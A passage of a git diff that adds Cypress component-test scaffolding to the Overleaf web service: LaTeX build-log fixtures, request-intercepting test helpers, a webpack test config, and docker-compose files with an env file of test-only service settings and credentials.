+{/usr/local/texlive/2020/texmf-var/fonts/map/pdftex/updmap/pdftex.map}] (/compi +le/output.aux) + +LaTeX Warning: There were undefined references. + + ) diff --git a/services/web/cypress/fixtures/build/output-undefined-references.log b/services/web/cypress/fixtures/build/output-undefined-references.log new file mode 100644 index 0000000..c2e4521 --- /dev/null +++ b/services/web/cypress/fixtures/build/output-undefined-references.log @@ -0,0 +1,10 @@ +Package rerunfilecheck Info: File `output.out' has not changed. +(rerunfilecheck) Checksum: 339DB29951BB30436898BC39909EA4FA;11265. + +Package rerunfilecheck Warning: File `output.brf' has changed. +(rerunfilecheck) Rerun to get bibliographical references right. + +Package rerunfilecheck Info: Checksums for `output.brf': +(rerunfilecheck) Before: D41D8CD98F00B204E9800998ECF8427E;0 +(rerunfilecheck) After: DF3260FAD3828D54C5E4E9337E97F7AF;4841. +) diff --git a/services/web/cypress/fixtures/build/output.blg b/services/web/cypress/fixtures/build/output.blg new file mode 100644 index 0000000..dd54e20 --- /dev/null +++ b/services/web/cypress/fixtures/build/output.blg @@ -0,0 +1 @@ +This is BibTeX, Version 4.0 diff --git a/services/web/cypress/fixtures/build/output.log b/services/web/cypress/fixtures/build/output.log new file mode 100644 index 0000000..768a905 --- /dev/null +++ b/services/web/cypress/fixtures/build/output.log @@ -0,0 +1,19 @@ +The LaTeX compiler output + * With a lot of details + +Wrapped in an HTML
     element with
    +      preformatted text which is to be presented exactly
    +            as written in the HTML file
    +
    +                                              (whitespace included™)
    +
    +The text is typically rendered using a non-proportional ("monospace") font.
    +
    +LaTeX Font Info:    External font `cmex10' loaded for size
    +(Font)              <7> on input line 18.
    +LaTeX Font Info:    External font `cmex10' loaded for size
    +(Font)              <5> on input line 18.
    +! Undefined control sequence.
    + \Zlpha
    +
    + main.tex, line 23
    diff --git a/services/web/cypress/fixtures/build/output.pdf b/services/web/cypress/fixtures/build/output.pdf
    new file mode 100644
    index 0000000..4c2cc85
    Binary files /dev/null and b/services/web/cypress/fixtures/build/output.pdf differ
    diff --git a/services/web/cypress/fixtures/images/gradient.png b/services/web/cypress/fixtures/images/gradient.png
    new file mode 100644
    index 0000000..a2152f9
    Binary files /dev/null and b/services/web/cypress/fixtures/images/gradient.png differ
    diff --git a/services/web/cypress/support/component-index.html b/services/web/cypress/support/component-index.html
    new file mode 100644
    index 0000000..ac6e79f
    --- /dev/null
    +++ b/services/web/cypress/support/component-index.html
    @@ -0,0 +1,12 @@
    +
    +
    +  
    +    
    +    
    +    
    +    Components App
    +  
    +  
    +    
    + + \ No newline at end of file diff --git a/services/web/cypress/support/component.ts b/services/web/cypress/support/component.ts new file mode 100644 index 0000000..9ded533 --- /dev/null +++ b/services/web/cypress/support/component.ts @@ -0,0 +1,12 @@ +import 'cypress-plugin-tab' +import { resetMeta } from './ct/window' // needs to be before i18n +import localesPromise from '@/i18n' +import './shared/commands' +import './shared/exceptions' +import './ct/commands' +import './ct/codemirror' +import '../../test/frontend/helpers/bootstrap-5' + +beforeEach(function () { + cy.wrap(localesPromise).then(resetMeta) +}) diff --git a/services/web/cypress/support/ct/codemirror.ts b/services/web/cypress/support/ct/codemirror.ts new file mode 100644 index 0000000..ab7a692 --- /dev/null +++ b/services/web/cypress/support/ct/codemirror.ts @@ -0,0 +1,4 @@ +import { EditorView } from '@codemirror/view' + +// @ts-ignore (disable EditContext-based editing until stable) +EditorView.EDIT_CONTEXT = false diff --git a/services/web/cypress/support/ct/commands/index.ts b/services/web/cypress/support/ct/commands/index.ts new file mode 100644 index 0000000..4ad9c79 --- /dev/null +++ b/services/web/cypress/support/ct/commands/index.ts @@ -0,0 +1,14 @@ +import { mount } from 'cypress/react' + +// eslint-disable-next-line no-unused-vars,@typescript-eslint/no-namespace +declare global { + // eslint-disable-next-line @typescript-eslint/no-namespace,no-unused-vars + namespace Cypress { + // eslint-disable-next-line no-unused-vars + interface Chainable { + mount: typeof mount + } + } +} + +Cypress.Commands.add('mount', mount) diff --git a/services/web/cypress/support/ct/window.ts b/services/web/cypress/support/ct/window.ts new file mode 100644 index 0000000..ae2a194 --- /dev/null +++ b/services/web/cypress/support/ct/window.ts @@ -0,0 +1,16 @@ +export function resetMeta() { + window.metaAttributesCache = new Map() + window.metaAttributesCache.set('ol-i18n', { currentLangCode: 'en' }) + window.metaAttributesCache.set('ol-ExposedSettings', { + appName: 'Overleaf', + validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'], + fileIgnorePattern: + '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}', + hasLinkedProjectFileFeature: true, + hasLinkedProjectOutputFileFeature: true, + hasLinkUrlFeature: true, + }) +} + +// Populate meta for top-level access in modules on import +resetMeta() diff --git a/services/web/cypress/support/shared/commands/compile.ts b/services/web/cypress/support/shared/commands/compile.ts new file mode 100644 index 0000000..9f7273c --- /dev/null +++ b/services/web/cypress/support/shared/commands/compile.ts @@ -0,0 +1,243 @@ +import { v4 as uuid } from 'uuid' + +const outputFiles = () => { + const build = uuid() + + return [ + { + path: 'output.pdf', + build, + url: `/build/${build}/output.pdf`, + type: 'pdf', + }, + { + path: 'output.bbl', + build, + url: `/build/${build}/output.bbl`, + type: 'bbl', + }, + { + path: 'output.bib', + build, + url: `/build/${build}/output.bib`, + type: 'bib', + }, + { + path: 'example.txt', + build, + url: `/build/${build}/example.txt`, + type: 'txt', + }, + { + path: 'output.log', + build, + url: `/build/${build}/output.log`, + type: 'log', + }, + { + path: 'output.blg', + build, + url: `/build/${build}/output.blg`, + type: 'blg', + }, + ] +} + +const compileFromCacheResponse = () => { + return { + fromCache: true, + status: 'success', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: outputFiles(), + options: { + rootResourcePath: 'main.tex', + imageName: 'texlive-full:2024.1', + compiler: 'pdflatex', + stopOnFirstError: false, + draft: false, + }, + } +} + +export const interceptCompileFromCacheRequest = ({ + times, + promise, +}: { + times: number + promise: Promise +}) => { + return cy.intercept( + { path: '/project/*/output/cached/output.overleaf.json', times }, + async req => { + await promise + req.reply({ body: compileFromCacheResponse() }) + } + ) +} + +export const interceptCompileRequest = ({ times = 1 } = {}) => { + return cy.intercept( + { method: 'POST', pathname: '/project/*/compile', times }, + { + body: { + status: 'success', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: outputFiles(), + }, + } + ) +} + +export const interceptCompile = ({ + prefix = 'compile', + times = 1, + cached = false, + regular = true, + outputPDFFixture = 'output.pdf', +} = {}) => { + if (cached) { + cy.intercept( + { path: '/project/*/output/cached/output.overleaf.json', times }, + { body: compileFromCacheResponse() } + ).as(`${prefix}-cached`) + } else { + cy.intercept( + { pathname: '/project/*/output/cached/output.overleaf.json', times }, + { statusCode: 404 } + ).as(`${prefix}-cached`) + } + + if (regular) { + interceptCompileRequest({ times }).as(`${prefix}`) + } else { + cy.intercept( + { method: 'POST', pathname: '/project/*/compile', times }, + { + body: { + status: 'unavailable', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: [], + }, + } + ).as(`${prefix}`) + } + + cy.intercept( + { pathname: '/build/*/output.pdf', times }, + { fixture: `build/${outputPDFFixture},null` } + ).as(`${prefix}-pdf`) + + cy.intercept( + { pathname: '/build/*/output.log', times }, + { fixture: 'build/output.log' } + ).as(`${prefix}-log`) + + cy.intercept( + { pathname: '/build/*/output.blg', times }, + { fixture: 'build/output.blg' } + ).as(`${prefix}-blg`) +} + +export const waitForCompile = ({ + prefix = 'compile', + pdf = false, + cached = false, + regular = true, +} = {}) => { + if (cached) { + cy.wait(`@${prefix}-cached`) + } + if (regular) { + cy.wait(`@${prefix}`) + } + return waitForCompileOutput({ prefix, pdf, cached }) +} + +export const waitForCompileOutput = ({ + prefix = 'compile', + pdf = false, + cached = false, +} = {}) => { + cy.wait(`@${prefix}-log`) + .its('request.query.clsiserverid') + .should('eq', cached ? 'cache' : 'foo') // straight from cache if cached + cy.wait(`@${prefix}-blg`) + .its('request.query.clsiserverid') + .should('eq', cached ? 'cache' : 'foo') // straight from cache if cached + if (pdf) { + cy.wait(`@${prefix}-pdf`) + .its('request.query.clsiserverid') + .should('eq', 'foo') // always from VM first + } + return cy.wrap(null) +} + +export const interceptDeferredCompile = (beforeResponse?: () => void) => { + const { promise, resolve } = Promise.withResolvers() + + cy.intercept( + { method: 'POST', url: '/project/*/compile*', times: 1 }, + req => { + if (beforeResponse) { + beforeResponse() + } + + // only reply once the Promise is resolved + promise.then(() => { + req.reply({ + body: { + status: 'success', + clsiServerId: 'foo', + compileGroup: 'priority', + pdfDownloadDomain: 'https://clsi.test-overleaf.com', + outputFiles: [ + { + path: 'output.pdf', + build: '123', + url: '/build/123/output.pdf', + type: 'pdf', + }, + { + path: 'output.log', + build: '123', + url: '/build/123/output.log', + type: 'log', + }, + { + path: 'output.blg', + build: '123', + url: '/build/123/output.blg', + type: 'log', + }, + ], + }, + }) + }) + + return promise + } + ).as('compile') + + cy.intercept( + { pathname: '/build/*/output.pdf', times: 1 }, + { fixture: 'build/output.pdf,null' } + ).as(`compile-pdf`) + + cy.intercept( + { pathname: '/build/*/output.log', times: 1 }, + { fixture: 'build/output.log' } + ).as(`compile-log`) + + cy.intercept( + { pathname: '/build/*/output.blg', times: 1 }, + { fixture: 'build/output.blg' } + ).as(`compile-blg`) + + return cy.wrap(resolve) +} diff --git a/services/web/cypress/support/shared/commands/events.ts b/services/web/cypress/support/shared/commands/events.ts new file mode 100644 index 0000000..26a6375 --- /dev/null +++ b/services/web/cypress/support/shared/commands/events.ts @@ -0,0 +1,5 @@ +export const interceptEvents = () => { + cy.intercept('POST', '/event/*', { + statusCode: 204, + }).as('createEvent') +} diff --git a/services/web/cypress/support/shared/commands/index.ts b/services/web/cypress/support/shared/commands/index.ts new file mode 100644 index 0000000..bb55fdd --- /dev/null +++ b/services/web/cypress/support/shared/commands/index.ts @@ -0,0 +1,56 @@ +import '@testing-library/cypress/add-commands' +import { + interceptCompile, + interceptCompileFromCacheRequest, + waitForCompile, + interceptDeferredCompile, + interceptCompileRequest, +} from './compile' +import { interceptEvents } from './events' +import { interceptAsync } from './intercept-async' +import { interceptFileUpload } from './upload' +import { interceptProjectListing } from './project-list' +import { interceptLinkedFile } from './linked-file' +import { interceptMathJax } from './mathjax' +import { interceptMetadata } from './metadata' +import { interceptTutorials } from './tutorials' + +// eslint-disable-next-line no-unused-vars,@typescript-eslint/no-namespace +declare global { + // eslint-disable-next-line @typescript-eslint/no-namespace,no-unused-vars + namespace Cypress { + // eslint-disable-next-line no-unused-vars + interface Chainable { + interceptAsync: typeof interceptAsync + interceptCompile: typeof interceptCompile + interceptCompileRequest: typeof interceptCompileRequest + interceptCompileFromCacheRequest: typeof interceptCompileFromCacheRequest + interceptEvents: typeof interceptEvents + interceptMetadata: typeof interceptMetadata + waitForCompile: typeof waitForCompile + interceptDeferredCompile: typeof interceptDeferredCompile + interceptFileUpload: typeof interceptFileUpload + interceptProjectListing: typeof interceptProjectListing + interceptLinkedFile: typeof interceptLinkedFile + interceptMathJax: typeof interceptMathJax + interceptTutorials: typeof interceptTutorials + } + } +} + +Cypress.Commands.add('interceptAsync', interceptAsync) +Cypress.Commands.add('interceptCompile', interceptCompile) +Cypress.Commands.add('interceptCompileRequest', interceptCompileRequest) +Cypress.Commands.add( + 'interceptCompileFromCacheRequest', + interceptCompileFromCacheRequest +) +Cypress.Commands.add('interceptEvents', interceptEvents) +Cypress.Commands.add('interceptMetadata', interceptMetadata) +Cypress.Commands.add('waitForCompile', waitForCompile) +Cypress.Commands.add('interceptDeferredCompile', interceptDeferredCompile) +Cypress.Commands.add('interceptFileUpload', interceptFileUpload) +Cypress.Commands.add('interceptProjectListing', interceptProjectListing) +Cypress.Commands.add('interceptLinkedFile', interceptLinkedFile) +Cypress.Commands.add('interceptMathJax', interceptMathJax) +Cypress.Commands.add('interceptTutorials', interceptTutorials) diff --git a/services/web/cypress/support/shared/commands/intercept-async.ts b/services/web/cypress/support/shared/commands/intercept-async.ts new file mode 100644 index 0000000..e11d10e --- /dev/null +++ b/services/web/cypress/support/shared/commands/intercept-async.ts @@ -0,0 +1,19 @@ +import { RouteHandler, RouteMatcher } from 'cypress/types/net-stubbing' + +export const interceptAsync = (route: RouteMatcher, alias: string) => { + const deferred: { resolve: (value: RouteHandler) => void } = { + resolve: () => { + console.error('This should never be called') + }, + } + + const promise = new Promise(resolve => { + deferred.resolve = resolve + }) + + cy.intercept(route, req => { + return promise.then(response => req.reply(response)) + }).as(alias) + + return cy.wrap(deferred) +} diff --git a/services/web/cypress/support/shared/commands/linked-file.ts b/services/web/cypress/support/shared/commands/linked-file.ts new file mode 100644 index 0000000..b3e1777 --- /dev/null +++ b/services/web/cypress/support/shared/commands/linked-file.ts @@ -0,0 +1,12 @@ +import { HttpRequestInterceptor } from 'cypress/types/net-stubbing' + +export const interceptLinkedFile = () => { + cy.intercept( + { method: 'POST', url: '/project/*/linked_file' }, + cy + .spy((req: Parameters[0]) => { + req.reply({ statusCode: 200, body: { success: true } }) + }) + .as('linked-file-request') + ) +} diff --git a/services/web/cypress/support/shared/commands/mathjax.ts b/services/web/cypress/support/shared/commands/mathjax.ts new file mode 100644 index 0000000..ed4cb02 --- /dev/null +++ b/services/web/cypress/support/shared/commands/mathjax.ts @@ -0,0 +1,32 @@ +const MATHJAX_STUB = ` +window.MathJax = { + startup: { + promise: Promise.resolve() + }, + svgStylesheet: () => document.createElement("STYLE"), + typesetPromise: (elements) => { + for (const element of elements) { + // This will keep math delimeters around the text + element.classList.add('MathJax') + } + return Promise.resolve() + }, + tex2svgPromise: (content) => { + const text = document.createElement('SPAN') + text.classList.add('MathJax') + text.innerText = content + return Promise.resolve(text) + }, + getMetricsFor: () => ({}), + texReset: () => {}, +} +` + +export const interceptMathJax = () => { + // NOTE: this is just a URL to be intercepted with the stub, not the real (versioned) MathJax URL + const url = '/js/libs/mathjax/es5/tex-svg-full.js' + cy.window().then(win => { + win.metaAttributesCache.set('ol-mathJaxPath', url) + }) + cy.intercept('GET', url, MATHJAX_STUB).as('mathjax-load-request') +} diff --git a/services/web/cypress/support/shared/commands/metadata.ts b/services/web/cypress/support/shared/commands/metadata.ts new file mode 100644 index 0000000..7548c40 --- /dev/null +++ b/services/web/cypress/support/shared/commands/metadata.ts @@ -0,0 +1,3 @@ +export const interceptMetadata = () => { + cy.intercept('POST', '/project/*/doc/*/metadata', {}) +} diff --git a/services/web/cypress/support/shared/commands/project-list.ts b/services/web/cypress/support/shared/commands/project-list.ts new file mode 100644 index 0000000..ea98947 --- /dev/null +++ b/services/web/cypress/support/shared/commands/project-list.ts @@ -0,0 +1,22 @@ +export const interceptProjectListing = () => { + cy.intercept('GET', '/user/projects', { + projects: [ + { + _id: 'fake-project-1', + accessLevel: 'owner', + name: 'My first project', + }, + { + _id: 'fake-project-2', + accessLevel: 'owner', + name: 'My second project', + }, + ], + }) + cy.intercept('GET', '/project/*/entities', { + entities: [ + { path: '/frog.jpg', type: 'file' }, + { path: 'figures/unicorn.png', type: 'file' }, + ], + }) +} diff --git a/services/web/cypress/support/shared/commands/tutorials.ts b/services/web/cypress/support/shared/commands/tutorials.ts new file mode 100644 index 0000000..900db6e --- /dev/null +++ b/services/web/cypress/support/shared/commands/tutorials.ts @@ -0,0 +1,5 @@ +export const interceptTutorials = () => { + cy.intercept('POST', '/tutorial/**', { + statusCode: 204, + }).as('completeTutorial') +} diff --git a/services/web/cypress/support/shared/commands/upload.ts b/services/web/cypress/support/shared/commands/upload.ts new file mode 100644 index 0000000..b03e566 --- /dev/null +++ b/services/web/cypress/support/shared/commands/upload.ts @@ -0,0 +1,18 @@ +import { HttpRequestInterceptor } from 'cypress/types/net-stubbing' + +export const interceptFileUpload = () => { + cy.intercept( + { method: 'POST', url: /\/project\/.*\/upload/ }, + cy + .spy((req: Parameters[0]) => { + const folderMatch = req.url.match( + /project\/.*\/upload\?folder_id=[a-f0-9]{24}/ + ) + if (!folderMatch) { + req.reply({ statusCode: 500, body: { success: false } }) + } + req.reply({ statusCode: 200, body: { success: true } }) + }) + .as('uploadRequest') + ) +} diff --git a/services/web/cypress/support/shared/exceptions.ts b/services/web/cypress/support/shared/exceptions.ts new file mode 100644 index 0000000..4eef572 --- /dev/null +++ b/services/web/cypress/support/shared/exceptions.ts @@ -0,0 +1,6 @@ +Cypress.on('uncaught:exception', err => { + // don't fail the test for ResizeObserver error messages + if (err.message.includes('ResizeObserver')) { + return false + } +}) diff --git a/services/web/cypress/support/webpack.cypress.ts b/services/web/cypress/support/webpack.cypress.ts new file mode 100644 index 0000000..eb8884c --- /dev/null +++ b/services/web/cypress/support/webpack.cypress.ts @@ -0,0 +1,52 @@ +import { merge } from 'webpack-merge' +import path from 'path' +import webpack from 'webpack' +import HtmlWebpackPlugin from 'html-webpack-plugin' +import devConfig from '../../webpack.config.dev' + +const buildConfig = () => { + const webpackConfig = merge(devConfig, { + output: { + workerPublicPath: '/__cypress/src/', + }, + devServer: { + static: path.join(__dirname, '../../public'), + port: 3200, + }, + stats: 'none', + plugins: [ + new webpack.EnvironmentPlugin({ + CYPRESS: true, + }), + new HtmlWebpackPlugin({ + template: path.resolve('./component-index.html'), + }), + ], + } as any) + + delete webpackConfig.devServer.client + + webpackConfig.entry = {} + const addWorker = (name: string, importPath: string) => { + webpackConfig.entry[name] = require.resolve(importPath) + } + + // add entrypoint under '/' for latex-linter worker + addWorker( + 'latex-linter-worker', + '../../frontend/js/features/source-editor/languages/latex/linter/latex-linter.worker' + ) + + // add entrypoint under '/' for hunspell worker + addWorker( + 'hunspell-worker', + '../../frontend/js/features/source-editor/hunspell/hunspell.worker' + ) + + // add entrypoints under '/' for pdfjs workers + addWorker('pdfjs-dist', 'pdfjs-dist/build/pdf.worker.mjs') + + return webpackConfig +} + +export const webpackConfig = buildConfig() diff --git a/services/web/data/.gitignore b/services/web/data/.gitignore new file mode 100644 index 0000000..0fa27a1 --- /dev/null +++ b/services/web/data/.gitignore @@ -0,0 +1,4 @@ +gnore everything in this directory +* +# Except this file +!.gitignore diff --git a/services/web/docker-compose.ci.yml b/services/web/docker-compose.ci.yml new file mode 100644 index 0000000..c277cc0 --- /dev/null +++ b/services/web/docker-compose.ci.yml @@ -0,0 +1,124 @@ +version: "2.3" + +volumes: + data: + +services: + + test_unit: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + user: node + command: npm run test:unit:app + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + - mongo + + test_acceptance: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + extra_hosts: + - 'www.overleaf.test:127.0.0.1' + command: npm run test:acceptance:app + user: root + depends_on: + - redis + - mongo + - saml + - ldap + tmpfs: + - /overleaf/services/web/data + + test_frontend: + build: + context: ../.. + dockerfile: services/web/Dockerfile + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + logging: + driver: local + user: node + working_dir: /overleaf/services/web + command: npm run test:frontend + environment: + NODE_OPTIONS: "--unhandled-rejections=strict" + + test_frontend_ct: + image: cypress/included:13.13.2 + logging: + driver: local + working_dir: /overleaf/services/web + environment: + CYPRESS_SPEC_PATTERN: ${CYPRESS_SPEC_PATTERN:-} + CYPRESS_EXCLUDE_SPEC_PATTERN: ${CYPRESS_EXCLUDE_SPEC_PATTERN:-} + volumes: + - ${CYPRESS_RESULTS:-./cypress/results}:/overleaf/services/web/cypress/results/ + - /dev/shm/overleaf:/overleaf + entrypoint: npm + command: + - "run" + - "cypress:run-ct" + + tar: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER-webpack + volumes: + - ./:/tmp/build/ + command: tar -cf /tmp/build/build.tar public/ + user: root + + redis: + image: redis + + mongo: + image: mongo:6.0.13 + logging: + driver: none + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + ldap: + image: rroemhild/test-openldap:1.1 + logging: + driver: none + # Workaround large memory allocation (using the max-open-files-limit as socket buffer scale). + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' + + saml: + image: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/saml-test + logging: + driver: none + environment: + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_ENTITY_ID: 'overleaf-test-saml' + SAML_TEST_SP_LOCATION: 'http://www.overleaf.test:23000/saml/callback' diff --git a/services/web/docker-compose.common.env b/services/web/docker-compose.common.env new file mode 100644 index 0000000..7f94f57 --- /dev/null +++ b/services/web/docker-compose.common.env @@ -0,0 +1,46 @@ +ADMIN_PRIVILEGE_AVAILABLE=true +BCRYPT_ROUNDS=1 +WEB_PORT=23000 +REDIS_HOST=redis +QUEUES_REDIS_HOST=redis +ANALYTICS_QUEUES_REDIS_HOST=redis +MONGO_URL=mongodb://mongo/test-overleaf +OVERLEAF_ALLOW_PUBLIC_ACCESS=true +LINKED_URL_PROXY=http://127.0.0.1:6543 +ENABLED_LINKED_FILE_TYPES=url,project_file,project_output_file,mendeley,zotero +NODE_ENV=test +NODE_OPTIONS=--unhandled-rejections=strict +LOCK_MANAGER_MAX_LOCK_WAIT_TIME=30000 +COOKIE_DOMAIN=.overleaf.test +ADMIN_URL=http://admin.overleaf.test +PUBLIC_URL=http://www.overleaf.test:23000 +HTTP_TEST_HOST=www.overleaf.test +OT_JWT_AUTH_KEY="very secret key" +EXTERNAL_AUTH=none +RECAPTCHA_ENDPOINT=http://127.0.0.1:2222/recaptcha/api/siteverify +# Server-Pro LDAP +OVERLEAF_LDAP_URL=ldap://ldap:389 +OVERLEAF_LDAP_SEARCH_BASE=ou=people,dc=planetexpress,dc=com +OVERLEAF_LDAP_SEARCH_FILTER="(uid={{username}})" +OVERLEAF_LDAP_BIND_DN=cn=admin,dc=planetexpress,dc=com +OVERLEAF_LDAP_BIND_CREDENTIALS=GoodNewsEveryone +OVERLEAF_LDAP_EMAIL_ATT=mail +OVERLEAF_LDAP_NAME_ATT=cn +OVERLEAF_LDAP_LAST_NAME_ATT=sn +OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN=true +# Server-Pro SAML +OVERLEAF_SAML_ENTRYPOINT=http://saml/simplesaml/saml2/idp/SSOService.php +OVERLEAF_SAML_CALLBACK_URL=http://saml/saml/callback +OVERLEAF_SAML_ISSUER=overleaf-test-saml +OVERLEAF_SAML_IDENTITY_SERVICE_NAME="SAML Test Server" +OVERLEAF_SAML_EMAIL_FIELD=email +OVERLEAF_SAML_FIRST_NAME_FIELD=givenName +OVERLEAF_SAML_LAST_NAME_FIELD=sn +OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN=true +# simplesaml cert from https://github.com/overleaf/google-ops/tree/master/docker-images/saml-test/var-simplesamlphp/cert +OVERLEAF_SAML_CERT=MIIDXTCCAkWgAwIBAgIJAOvOeQ4xFTzsMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNVBAYTAkdCMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTYxMTE1MTQxMjU5WhcNMjYxMTE1MTQxMjU5WjBFMQswCQYDVQQGEwJHQjETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCT6MBe5G9VoLU8MfztOEbUhnwLp17ak8eFUqxqeXkkqtWB0b/cmIBU3xoQoO3dIF8PBzfqehqfYVhrNt/TFgcmDfmJnPJRL1RJWMW3VmiP5odJ3LwlkKbZpkeT3wZ8HEJIR1+zbpxiBNkbd2GbdR1iumcsHzMYX1A2CBj+ZMV5VijC+K4P0e9c05VsDEUtLmfeAasJAiumQoVVgAe/BpiXjICGGewa6EPFI7mKkifIRKOGxdRESwZZjxP30bI31oDN0cgKqIgSJtJ9nfCn9jgBMBkQHu42WMuaWD4jrGd7+vYdX+oIfArs9aKgAH5kUGhGdew2R9SpBefrhbNxG8QIDAQABo1AwTjAdBgNVHQ4EFgQU+aSojSyyLChP/IpZcafvSdhj7KkwHwYDVR0jBBgwFoAU+aSojSyyLChP/IpZcafvSdhj7KkwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEABl3+OOVLBWMKs6PjA8lPuloWDNzSr3v76oUcHqAb+cfbucjXrOVsS9RJ0X9yxvCQyfM9FfY43DbspnN3izYhdvbJD8kKLNf0LA5st+ZxLfy0ACyL2iyAwICaqndqxAjQYplFAHmpUiu1DiHckyBPekokDJd+ze95urHMOsaGS5RWPoKJVE0bkaAeZCmEu0NNpXRSBiuxXSTeSAJfv6kyE/rkdhzUKyUl/cGQFrsVYfAFQVA+W6CKOh74ErSEzSHQQYndl7nD33snD/YqdU1ROxV6aJzLKCg+sdj+wRXSP2u/UHnM4jW9TGJfhO42jzL6WVuEvr9q4l7zWzUQKKKhtQ== +# DEVICE_HISTORY_SECRET has been generated using: +# NOTE: crypto.generateKeySync was added in v15, v16 is the next LTS release. +# $ docker run --rm node:20.18.2 --print 'require("crypto").generateKeySync("aes", { length: 256 }).export().toString("hex")' +DEVICE_HISTORY_SECRET=1b46e6cdf72db02845da06c9517c9cfbbfa0d87357479f4e1df3ce160bd54807 +QUEUE_PROCESSING_ENABLED=true diff --git a/services/web/docker-compose.cypress.yml b/services/web/docker-compose.cypress.yml new file mode 100644 index 0000000..5c0cb95 --- /dev/null +++ b/services/web/docker-compose.cypress.yml @@ -0,0 +1,14 @@ +services: + cypress: + image: cypress/included:13.13.2 + volumes: + - ../../:/overleaf + - /tmp/.X11-unix:/tmp/.X11-unix + working_dir: /overleaf/services/web + entrypoint: npm + command: run cypress:open-ct + user: "${DOCKER_USER:-1000:1000}" + environment: + VERBOSE_LOGGING: + DISPLAY: ${DISPLAY:-:0} +# DEBUG: cypress.* diff --git a/services/web/docker-compose.yml b/services/web/docker-compose.yml new file mode 100644 index 0000000..c6a5aa7 --- /dev/null +++ b/services/web/docker-compose.yml @@ -0,0 +1,117 @@ +version: "2.3" + +volumes: + data: + +services: + + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit:app + user: node + depends_on: + - mongo + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + user: node + working_dir: /overleaf/services/web + env_file: docker-compose.common.env + environment: + BASE_CONFIG: + OVERLEAF_CONFIG: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + MONGO_SERVER_SELECTION_TIMEOUT: 600000 + MONGO_SOCKET_TIMEOUT: 300000 + # OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true' + + extra_hosts: + - 'www.overleaf.test:127.0.0.1' + depends_on: + - redis + - mongo + - saml + - ldap + command: npm run --silent test:acceptance:app + + test_frontend: + build: + context: ../.. + dockerfile: services/web/Dockerfile + target: base + volumes: + - .:/overleaf/services/web + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/web + environment: + MOCHA_GREP: ${MOCHA_GREP} + NODE_OPTIONS: "--unhandled-rejections=strict" + VERBOSE_LOGGING: + command: npm run --silent test:frontend + user: node + + test_frontend_ct: + image: cypress/included:13.13.2 + volumes: + - ../../:/overleaf + working_dir: /overleaf/services/web + environment: + VERBOSE_LOGGING: + CYPRESS_SPEC_PATTERN: ${CYPRESS_SPEC_PATTERN:-} + CYPRESS_EXCLUDE_SPEC_PATTERN: ${CYPRESS_EXCLUDE_SPEC_PATTERN:-} + entrypoint: npm + command: + - "run" + - "cypress:run-ct" + + redis: + image: redis + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + ldap: + image: rroemhild/test-openldap:1.1 + # Workaround large memory allocation (using the 